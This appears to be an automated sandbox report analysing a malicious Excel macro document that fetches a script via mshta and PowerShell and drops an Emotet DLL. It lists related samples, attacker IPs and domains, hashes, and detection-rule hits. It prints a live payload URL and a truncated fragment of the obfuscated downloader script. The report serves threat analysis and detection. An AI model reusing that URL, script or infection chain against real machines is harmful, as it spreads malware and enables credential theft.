                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .xls
                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                    • Attach to Office via COM
                                    • Scroll down
                                    • Close Viewer

                                    Warnings

                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                    • Execution Graph export aborted for target mshta.exe, PID 2840 because there are no executed function
                                    • Execution Graph export aborted for target powershell.exe, PID 3012 because it is empty
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    21:24:20API Interceptor62x Sleep call for process: mshta.exe modified
                                    21:24:24API Interceptor441x Sleep call for process: powershell.exe modified
                                    21:24:42API Interceptor114x Sleep call for process: rundll32.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    207.148.81.119DOCUMENT_2801.xlsGet hashmaliciousBrowse
                                      DETAILS-145.xlsGet hashmaliciousBrowse
                                        info_301.xlsGet hashmaliciousBrowse
                                          5R5Dz9UhFae3QqksIqR.dllGet hashmaliciousBrowse
                                            gqxdiBj7JLMI.dllGet hashmaliciousBrowse
                                              Ylb9.dllGet hashmaliciousBrowse
                                                HXYM4z2.dllGet hashmaliciousBrowse
                                                  W5Tmx0pFkC6A.dllGet hashmaliciousBrowse
                                                    w87Hl.dllGet hashmaliciousBrowse
                                                      zvb7uw.dllGet hashmaliciousBrowse
                                                        https___lastregaristorante.com_wp-admin_ffdC7ElM2Bn2_Fri_Jan_28_10_48_23_AM_CST_2022.dllGet hashmaliciousBrowse
                                                          https___oculusvisioncare.com_wp-includes_ZEYDjosbNExFTdu_Fri_Jan_28_10_48_26_AM_CST_2022.dllGet hashmaliciousBrowse
                                                            https___mypurealsystem.com_App_Start_Rhh8lKO_Fri_Jan_28_10_48_15_AM_CST_2022.dllGet hashmaliciousBrowse
                                                              Q_2801.xlsGet hashmaliciousBrowse
                                                                X_2801.xlsGet hashmaliciousBrowse
                                                                  2026P-2801.xlsGet hashmaliciousBrowse
                                                                    Mail_27012022.xlsGet hashmaliciousBrowse
                                                                      gLbGdSSQmEnKdhkSLJv.dllGet hashmaliciousBrowse
                                                                        x6eU6QrnmgTO4svU.dllGet hashmaliciousBrowse
                                                                          MrrnzVVCORolbHHw.dllGet hashmaliciousBrowse
                                                                            104.131.62.48Attachment-2801.xlsGet hashmaliciousBrowse
                                                                              DOCUMENT_2801.xlsGet hashmaliciousBrowse
                                                                                DETAILS-145.xlsGet hashmaliciousBrowse
                                                                                  info_301.xlsGet hashmaliciousBrowse
                                                                                    5R5Dz9UhFae3QqksIqR.dllGet hashmaliciousBrowse
                                                                                      gqxdiBj7JLMI.dllGet hashmaliciousBrowse
                                                                                        Ylb9.dllGet hashmaliciousBrowse
                                                                                          HXYM4z2.dllGet hashmaliciousBrowse
                                                                                            W5Tmx0pFkC6A.dllGet hashmaliciousBrowse
                                                                                              w87Hl.dllGet hashmaliciousBrowse
                                                                                                zvb7uw.dllGet hashmaliciousBrowse
                                                                                                  https___lastregaristorante.com_wp-admin_ffdC7ElM2Bn2_Fri_Jan_28_10_48_23_AM_CST_2022.dllGet hashmaliciousBrowse
                                                                                                    https___oculusvisioncare.com_wp-includes_ZEYDjosbNExFTdu_Fri_Jan_28_10_48_26_AM_CST_2022.dllGet hashmaliciousBrowse
                                                                                                      https___mypurealsystem.com_App_Start_Rhh8lKO_Fri_Jan_28_10_48_15_AM_CST_2022.dllGet hashmaliciousBrowse
                                                                                                        Q_2801.xlsGet hashmaliciousBrowse
                                                                                                          X_2801.xlsGet hashmaliciousBrowse
                                                                                                            2026P-2801.xlsGet hashmaliciousBrowse
                                                                                                              Mail_27012022.xlsGet hashmaliciousBrowse
                                                                                                                gLbGdSSQmEnKdhkSLJv.dllGet hashmaliciousBrowse
                                                                                                                  x6eU6QrnmgTO4svU.dllGet hashmaliciousBrowse

                                                                                                                    Domains

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                    kuyporn.comDETAILS-145.xlsGet hashmaliciousBrowse
                                                                                                                    • 172.67.149.209
                                                                                                                    BR 18833597536.xlsGet hashmaliciousBrowse
                                                                                                                    • 104.21.11.177
                                                                                                                    report_6.xlsGet hashmaliciousBrowse
                                                                                                                    • 172.67.149.209
                                                                                                                    comments_175343.xlsGet hashmaliciousBrowse
                                                                                                                    • 172.67.149.209
                                                                                                                    CT 7839428.xlsGet hashmaliciousBrowse
                                                                                                                    • 104.21.11.177
                                                                                                                    INFO 388968.xlsGet hashmaliciousBrowse
                                                                                                                    • 172.67.149.209
                                                                                                                    Fichier-27012022.xlsGet hashmaliciousBrowse
                                                                                                                    • 172.67.149.209
                                                                                                                    DOCUMENT-8.xlsGet hashmaliciousBrowse
                                                                                                                    • 104.21.11.177
                                                                                                                    Message 2701.xlsGet hashmaliciousBrowse
                                                                                                                    • 104.21.11.177
                                                                                                                    02L_78562.xlsGet hashmaliciousBrowse
                                                                                                                    • 104.21.11.177
                                                                                                                    untitled 667.xlsGet hashmaliciousBrowse
                                                                                                                    • 104.21.11.177
                                                                                                                    DOCUMENT_27012022.xlsGet hashmaliciousBrowse
                                                                                                                    • 104.21.11.177
                                                                                                                    message_40986562.xlsGet hashmaliciousBrowse
                                                                                                                    • 172.67.149.209
                                                                                                                    PACK-5191097.xlsGet hashmaliciousBrowse
                                                                                                                    • 104.21.11.177
                                                                                                                    PACK 628.xlsGet hashmaliciousBrowse
                                                                                                                    • 104.21.11.177
                                                                                                                    message_64956614.xlsGet hashmaliciousBrowse
                                                                                                                    • 104.21.11.177
                                                                                                                    jeffreylubin.igclout.comDETAILS-145.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157
                                                                                                                    BR 18833597536.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157
                                                                                                                    report_6.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157
                                                                                                                    comments_175343.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157
                                                                                                                    CT 7839428.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157
                                                                                                                    INFO 388968.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157
                                                                                                                    Fichier-27012022.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157
                                                                                                                    DOCUMENT-8.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157
                                                                                                                    Message 2701.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157
                                                                                                                    02L_78562.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157
                                                                                                                    untitled 667.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157
                                                                                                                    DOCUMENT_27012022.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157
                                                                                                                    message_40986562.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157
                                                                                                                    PACK-5191097.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157
                                                                                                                    PACK 628.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157
                                                                                                                    message_64956614.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157

                                                                                                                    ASNs

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                    AS-CHOOPAUSDOCUMENT_2801.xlsGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    DETAILS-145.xlsGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    info_301.xlsGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    5R5Dz9UhFae3QqksIqR.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    gqxdiBj7JLMI.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    Ylb9.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    HXYM4z2.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    W5Tmx0pFkC6A.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    w87Hl.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    zvb7uw.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    https___lastregaristorante.com_wp-admin_ffdC7ElM2Bn2_Fri_Jan_28_10_48_23_AM_CST_2022.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    https___oculusvisioncare.com_wp-includes_ZEYDjosbNExFTdu_Fri_Jan_28_10_48_26_AM_CST_2022.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    https___mypurealsystem.com_App_Start_Rhh8lKO_Fri_Jan_28_10_48_15_AM_CST_2022.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    Q_2801.xlsGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    X_2801.xlsGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    Mozi.m.3Get hashmaliciousBrowse
                                                                                                                    • 95.179.227.24
                                                                                                                    2026P-2801.xlsGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    Mail_27012022.xlsGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    gLbGdSSQmEnKdhkSLJv.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    x6eU6QrnmgTO4svU.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    DIGITALOCEAN-ASNUSAttachment-2801.xlsGet hashmaliciousBrowse
                                                                                                                    • 128.199.192.135
                                                                                                                    CJ68000754184.xlsGet hashmaliciousBrowse
                                                                                                                    • 164.90.147.135
                                                                                                                    DOCUMENT_2801.xlsGet hashmaliciousBrowse
                                                                                                                    • 128.199.192.135
                                                                                                                    DETAILS-145.xlsGet hashmaliciousBrowse
                                                                                                                    • 128.199.192.135
                                                                                                                    imedpub_2.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    imedpub_6.xlsGet hashmaliciousBrowse
                                                                                                                    • 164.90.147.135
                                                                                                                    imedpub.com_6.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    imedpub_8.xlsGet hashmaliciousBrowse
                                                                                                                    • 164.90.147.135
                                                                                                                    imedpub.com_10.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    iMedPub LTD_10.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    iMedPub LTD_12.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    iMedPub LTD_14.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    NZW-010122 BNUV-280122.xlsmGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    iMedPub LTD_15.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    iMedPub LTD_2.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    iMedPub LTD_3.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    iMedPub LTD_7.xlsGet hashmaliciousBrowse
                                                                                                                    • 164.90.147.135
                                                                                                                    iMedPub LTD_8.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    imedpub.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    info_301.xlsGet hashmaliciousBrowse
                                                                                                                    • 128.199.192.135

                                                                                                                    JA3 Fingerprints

                                                                                                                    No context

                                                                                                                    Dropped Files

                                                                                                                    No context

                                                                                                                    Created / dropped Files

                                                                                                                    C:\ProgramData\QWER.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):557056
                                                                                                                    Entropy (8bit):7.0041232632621595
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:HUNF4UQXTkkAiBuGKDU5PSczbmOTT0DaTMGOUylbdTN1itwRClN6RfcjJxX4R0Zq:AeAa4DU5PSczbmmTzTn7yDx6BrWt
                                                                                                                    MD5:DF8A5542B86A487AD0C0581E11F0B5EB
                                                                                                                    SHA1:170867F21CA9A1B9CACC84336441449BAE0D4911
                                                                                                                    SHA-256:69DB5ABABB04BC8A6805647D738E69663ADDACF57AAD0CB9384B60804260A266
                                                                                                                    SHA-512:F8E739A1CCBF86AD6B694E4AF44121117373B775C262889F54EFDE52ECC439A358A9C148AD527490FACBA3EDA439F2379CF032B0E36C17CB4324C85C2BA28525
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: C:\ProgramData\QWER.dll, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hs.a,..2,..2,..2...2&..2...27..2,..2...2...26..2...2...2...2...2...2-..2...2-..2...2-..2Rich,..2................PE..L......a...........!.....P... ...............`......................................]...............................@-..R...4...........Pv................... ..0N......................................@............`..........@....................text...9E.......P.................. ..`.rdata.......`.......`..............@..@.data....e...0...0...0..............@....rsrc...Pv...........`..............@..@.reloc..v.... ......................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\se[1].htm

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\mshta.exe
                                                                                                                    File Type:data
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):11230
                                                                                                                    Entropy (8bit):6.174353476920402
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:aYVCkQn+a8Ytu3jBoYwMxsybTH8lNQwAB3fEbMH4+juo8w8q0T1fEnXAdZl+gpX:aYUkNa8ZBoYwMDXH8lNbs8BJZl+WX
                                                                                                                    MD5:3CDAF9C34211A5219808433770A34E72
                                                                                                                    SHA1:A16F4AC4AF7E46FF84E330BF50A9B6AA6A9A93EC
                                                                                                                    SHA-256:CD29D9E79ED2874B6597961173BA7EF09B5F2295CF330BFDAEFF84459EBC58FB
                                                                                                                    SHA-512:489E0C619AC80BBE287D8C9C339A11932CB8991EFBD29D536B3D45F9259D325551DF9DC6B1B38DFC4B72051CB05C856C81F9B767CE66A910FE3876927CE657C2
                                                                                                                    Malicious:false
                                                                                                                    IE Cache URL:http://91.240.118.168/qqw/aas/se.html
                                                                                                                    Preview:.......................................................................................................................................................................<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode||document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');f9f76c|=lII;zLP=location.protocol+'0FD';vLG487Q2fbnWb=new Array();d3fUhQBfUW303=new Array();d3fUhQBfUW303[0]='c\161\171R%50%32e%37' ;vLG487Q2fbnWb[0]='.<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C~..D.T.D. .X.H.T.M.L. .1...0. .T.r.a.n.s.i.t.i.o.n.a.l~..E.N."~.~\n.t.p.:~..w~B...w.3...o.r.g./.T.R./.x~\n~..1./~..D~N~P.l.1.-.t~-~/~1~3~5.l...d.t.d.".>.<~W. .x~.~/.=."~=~?~A~C~E~G~I./.1.9~y~V~..l~f~h.e.a.d~g.s.c.r.i.p.t.>.e.v~6.(.u.n.e}..a.p.e.(.\'.\\.1.6.6.a.r.%.2.0.%.7

                                                                                                                    C:\Users\user\AppData\Local\Temp\3DBB.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1536
                                                                                                                    Entropy (8bit):1.1464700112623651
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                                                                                                    MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                                                                                                    SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                                                                                                    SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                                                                                                    SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                                                                                                    Malicious:false
                                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Users\user\AppData\Local\Temp\~DF33AC78DEA2F7DEBE.TMP

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):28672
                                                                                                                    Entropy (8bit):2.664554788742027
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:YxsINg5+nBqmIk3hbdlylKsgqopeJBWhZFGkE+cML:YY+nBqmIk3hbdlylKsgqopeJBWhZFGk7
                                                                                                                    MD5:534B016025B9A11F0776BBE070BC9EBC
                                                                                                                    SHA1:23D5520395E4BC1DF6ADE5661554F1DD387DB5CA
                                                                                                                    SHA-256:6CE3127C861EB2D24C2CB18AD25C43FB09DC0D15AC4F9C727553C6B30D75BF3D
                                                                                                                    SHA-512:09D74BFD0E1422045B40ED37C12EE5380D319F867977725917CE16567012E25562EDDE24E7334073BB59E81DF766501B54A8FD1B9F5D7E66DF9E84BBD57D124D
                                                                                                                    Malicious:false
                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Users\user\AppData\Local\Temp\~DFD5CC603F304DA47F.TMP

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):512
                                                                                                                    Entropy (8bit):0.0
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3::
                                                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                    Malicious:false
                                                                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msge (copy)

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):8016
                                                                                                                    Entropy (8bit):3.58430027744578
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:chQCcMqKqvsqvJCwofz8hQCcMqKqvsEHyqvJCworZzIuYnH8UVhxlUVNA2:cizofz8inHnorZzISUVhwA2
                                                                                                                    MD5:BBF24C74B986F6F6C20B1E5FDB284B55
                                                                                                                    SHA1:7ABC527DFA9B1042FE33CEB2A1E45EDB899283D2
                                                                                                                    SHA-256:CDAA6B0B445AB013223918A3E7D6275E7678F7614417671E68168F1800A9781C
                                                                                                                    SHA-512:F8DACF2FF7E4A6417858C68BA4FEE02B4917EEA8819188ABF119008269B468F99B00862308DE35ABCB58FDDF86C713CDDDBCA291BC56BA169948D702E2A8202D
                                                                                                                    Malicious:false
                                                                                                                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S".*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\S5S79XMEXB2FN0C1X28V.temp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):8016
                                                                                                                    Entropy (8bit):3.58430027744578
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:chQCcMqKqvsqvJCwofz8hQCcMqKqvsEHyqvJCworZzIuYnH8UVhxlUVNA2:cizofz8inHnorZzISUVhwA2
                                                                                                                    MD5:BBF24C74B986F6F6C20B1E5FDB284B55
                                                                                                                    SHA1:7ABC527DFA9B1042FE33CEB2A1E45EDB899283D2
                                                                                                                    SHA-256:CDAA6B0B445AB013223918A3E7D6275E7678F7614417671E68168F1800A9781C
                                                                                                                    SHA-512:F8DACF2FF7E4A6417858C68BA4FEE02B4917EEA8819188ABF119008269B468F99B00862308DE35ABCB58FDDF86C713CDDDBCA291BC56BA169948D702E2A8202D
                                                                                                                    Malicious:false
                                                                                                                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S".*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                                                                                                                    C:\Users\user\Desktop\80_513972285.xls

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Jan 26 22:33:31 2022, Last Saved Time/Date: Wed Jan 26 22:36:27 2022, Security: 0
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):77312
                                                                                                                    Entropy (8bit):5.8321952104972015
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:mY+nBqmIk3hbdlylKsgqopeJBWhZFGkE+cMLxAAIiQ5gQ72IotO6nitSUPU+82:mY+nBqmIk3hbdlylKsgqopeJBWhZFGk0
                                                                                                                    MD5:A018CC966C33496CFF077ABC3DAF17DF
                                                                                                                    SHA1:D58C223830595260C541145D65470976089070EF
                                                                                                                    SHA-256:463CD2CAF117E08BEC77B0F3FB7A6701F033C178588CDD80B053440B7A4BE474
                                                                                                                    SHA-512:A4008612AEDEBAC2DADE1394B498F3822A6AF08BBB693DAD2C29451DDC1EB18CDEBD47D50D4FB93F0278415FBA59156CEC358816FD7AC33C2FD35623C04A8276
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\80_513972285.xls, Author: John Lambert @JohnLaTwC
                                                                                                                    • Rule: JoeSecurity_XlsWithMacro4, Description: Yara detected Xls With Macro 4.0, Source: C:\Users\user\Desktop\80_513972285.xls, Author: Joe Security
                                                                                                                    • Rule: INDICATOR_OLE_Excel4Macros_DL2, Description: Detects OLE Excel 4 Macros documents acting as downloaders, Source: C:\Users\user\Desktop\80_513972285.xls, Author: ditekSHen
                                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....user B.....a.........=.............................................=........p.08.......X.@...........".......................1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1.*.h...6..........C.a.l.i.b.r.i. .L.i.g.h.t.

                                                                                                                    C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda (copy)

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):557056
                                                                                                                    Entropy (8bit):7.0041232632621595
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:HUNF4UQXTkkAiBuGKDU5PSczbmOTT0DaTMGOUylbdTN1itwRClN6RfcjJxX4R0Zq:AeAa4DU5PSczbmmTzTn7yDx6BrWt
                                                                                                                    MD5:DF8A5542B86A487AD0C0581E11F0B5EB
                                                                                                                    SHA1:170867F21CA9A1B9CACC84336441449BAE0D4911
                                                                                                                    SHA-256:69DB5ABABB04BC8A6805647D738E69663ADDACF57AAD0CB9384B60804260A266
                                                                                                                    SHA-512:F8E739A1CCBF86AD6B694E4AF44121117373B775C262889F54EFDE52ECC439A358A9C148AD527490FACBA3EDA439F2379CF032B0E36C17CB4324C85C2BA28525
                                                                                                                    Malicious:false
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hs.a,..2,..2,..2...2&..2...27..2,..2...2...26..2...2...2...2...2...2-..2...2-..2...2-..2Rich,..2................PE..L......a...........!.....P... ...............`......................................]...............................@-..R...4...........Pv................... ..0N......................................@............`..........@....................text...9E.......P.................. ..`.rdata.......`.......`..............@..@.data....e...0...0...0..............@....rsrc...Pv...........`..............@..@.reloc..v.... ......................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                    Static File Info

                                                                                                                    General

                                                                                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Jan 26 22:33:31 2022, Last Saved Time/Date: Wed Jan 26 22:36:27 2022, Security: 0
                                                                                                                    Entropy (8bit):5.808717628749656
                                                                                                                    TrID:
                                                                                                                    • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                    File name:80_513972285.xls
                                                                                                                    File size:77726
                                                                                                                    MD5:c130bfd7e7632f18fcd505d0991f192f
                                                                                                                    SHA1:da0d0031d5f6386f0df623a3c1cabfe4e9778f51
                                                                                                                    SHA256:eaad4c93a96bb50a79e024650ae4808afd7fddbd604cbc4048416ddcb20e6aae
                                                                                                                    SHA512:e82290b7464a50131ed10a6eb2cae1e1e97cefda42536765347451bfa53d1989613a126dfed99b2a885c0ebba8c7d20f73d6e2737f441a38a70a689dc6e2b026
                                                                                                                    SSDEEP:1536:xY+nBqmIk3hbdlylKsgqopeJBWhZFGkE+cMLxAAIiQ5gQ72IotO6nitSUPU+8:xY+nBqmIk3hbdlylKsgqopeJBWhZFGkZ
